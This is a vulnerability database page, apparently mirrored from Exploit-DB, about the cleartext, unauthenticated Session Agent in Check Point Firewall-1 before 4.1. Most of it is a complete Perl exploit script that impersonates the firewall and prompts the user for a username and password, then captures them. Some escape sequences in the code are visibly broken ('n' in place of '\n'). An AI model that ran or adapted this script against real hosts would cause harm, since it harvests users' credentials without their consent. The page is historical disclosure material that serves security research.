Check Point Software Firewall-1 3.0/1 4.0 – Session Agent Impersonation

Check Point Software Firewall-1 3.0/1 4.0 – Session Agent Impersonation

漏洞ID 1053375 漏洞类型
发布时间 1998-09-24 更新时间 1998-09-24
图片[1]-Check Point Software Firewall-1 3.0/1 4.0 – Session Agent Impersonation-安全小百科CVE编号 N/A
图片[2]-Check Point Software Firewall-1 3.0/1 4.0 – Session Agent Impersonation-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/20214
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/1661/info

A vulnerability exists in the "Session Agent" portion of Firewall-1, from Check Point. This vulnerability appears to affect all versions of the session agent prior to the one shipped in FW-1 4.1. The session agent listens on a Windows 9x or NT box for connections from the firewall, requesting user authentication for connections. This information is all transmitted in cleartext, and is unauthenticated. This means it can be sniffed. In addition, the agent accepts connections from any host. Any person who can connect to the session agent can impersonate the Firewall-1 module, and request username and password information. If supplied, this can result in the compromise of that username and password.

#!/usr/bin/perl -w
#
# This script connects to a FireWall-1 Session Authentication Agent
# running on Windows 95/NT. It attempts to "authenticate" the remote
# user and returns the resulting username/password.
#
# The agent supports configuration of up to three IP addresses which
# are allowed to submit authentication requests. If there are three
# addresses configured, the user is presented with the following when
# an unknown host connects:
#
# "Authentication request from this IP Address is not allowed."
# [ OK ]
#
# If there are only one or two addresses allowed, the user gets this
# nice little dialog box:
#
# "Do you want to enter this IP to the Firewall-1 list"
# [ YES ] (default) [ NO ]
#
# Guess which button your typical user will click on?
#
# If the agent closes the connection prematurely, you will get strange
# results.
#
# tested vs. FW-1 Authentication Agent 1.1
#
# Andrew Danforth <[email protected]>

require 5.000;

use Socket;
use Getopt::Std;

$| = 1;

$FIREWALL_NAME = "Corporate Firewall";
$PASSWORD_PROMPT = "FireWall-1 password";
$PORT = 261;

die unless getopts('n:p:');

unless ($TARGET_IP = shift) {
print "usage: $0 [-n firewall_name] [-p password_prompt] target_ipn";
exit(1);
}

$FIREWALL_NAME = $opt_n if (defined $opt_n);
$PASSWORD_PROMPT = $opt_p if (defined $opt_p);

socket(SOCK, AF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "socket: $!";
connect(SOCK, sockaddr_in($PORT, inet_aton($TARGET_IP))) || die "connect: $!";

select(SOCK); $| = 1; select(STDOUT);

print SOCK "220 FW-1 Session Authentication Request from $FIREWALL_NAMEnr";
print "sent greetingn";
print SOCK "331 User:nr";
print "sent user requestn";
$username = &get_response;
print "username entered: $usernamen";
print SOCK "331 *$PASSWORD_PROMPT:nr";
$password = &get_response;
print "password entered: $passwordn";
print SOCK "200 User $username authenticated by FireWall-1 authentication.nr";
print SOCK "230 OKnr";

sub get_response {
# this is ugly but it works. the session agent doesn't seem to send proper newlines.
my $input;
$input .= $key while($key = getc SOCK and ord($key));
return $input;
}

相关推荐: Solaris chkey Vulnerability

Solaris chkey Vulnerability 漏洞ID 1105082 漏洞类型 Boundary Condition Error 发布时间 1997-05-19 更新时间 1997-05-19 CVE编号 N/A CNNVD-ID N/A 漏洞平台…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享